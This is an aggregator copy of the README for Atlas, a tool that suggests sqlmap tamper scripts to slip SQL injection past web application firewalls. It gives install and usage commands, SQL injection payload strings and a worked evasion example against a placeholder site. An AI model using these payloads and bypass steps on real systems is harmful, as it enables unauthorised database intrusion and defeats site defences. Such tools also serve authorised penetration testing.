66
GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester
source link: https://github.com/m4ll0k/Atlas
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
Atlas - Quick SQLMap Tamper Suggester (beta v.)
Atlas is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.
Screen
Installation
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py
Usage
$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --dbms=mysql --random-agent -v
Example
- Run SQLMap:
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
Price_ASC') AND 8716=4837 AND ('yajr'='yajr
is blocked by WAF/IDS/IPS, now trying with Atlas:
$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
At this point:
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK